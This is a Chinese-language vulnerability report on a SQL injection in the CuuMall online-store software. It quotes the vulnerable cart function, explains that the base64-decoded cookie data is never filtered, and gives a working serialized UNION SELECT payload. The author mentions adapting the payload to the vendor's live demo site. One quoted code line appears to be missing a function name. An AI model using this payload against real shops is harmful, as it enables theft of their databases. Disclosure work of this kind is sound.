CuuMall最新版sql注入-2

### 简要描述： CuuMall免费网上商城系统基于企业级MVC技术架构，安全、稳定，可保证同时在线人数达10000人左右，能适应不同领域的公司企业，文件缓存机制、数据库缓存机制，保证系统稳定运行，多种功能以满足不同客户网上开店的需求。 ### 详细说明： ``` 在文件 carAction.class.php中： public function getmallcar( ) { $getmallcar = new MallcarAction( ); $arr = $getmallcar->redcar( ); $car = new Model( "produc" ); $i = 0; foreach ( $arr as $key => $value ) { $ids = ( "|", $key ); $pro[$i] = $car->where( "id=".$ids[0] )->find( ); $pram = $ids[1]; if ( empty( $pram ) ) { $pro[$i]['pram'] = ""; } else { $pro[$i]['pram'] = $ids[1]; } $pro[$i]['allprice'] = $pro[$i]['memprice'] * $value; $pro[$i]['num'] = $value; $i += 1; } return $pro; } ``` $arr = $getmallcar->redcar( ); 是从cookie中获取指定内容。程序只是在全局做了cookie的过滤，但是cookie获取后的数据进行了base64解码，没有对解码后的数据进行过滤，导致sql注入。 PS：：本地测试 表的字段是38个，但在官网demo测试居然不通过，搞了好久 发现官网上只有36个字段，真坑！ POC: a:1:{s:143:"0 UNION SELECT 1,2,3,4,concat(user(),'$',database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36#|";i:2;} ### 漏洞证明： [<img src="https://images.seebug.org/upload/201409/292055434493593ee65d87cd16ffdacc0113689e.png" alt="BaiduHi_2014-9-29_20-49-23.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/292055434493593ee65d87cd16ffdacc0113689e.png)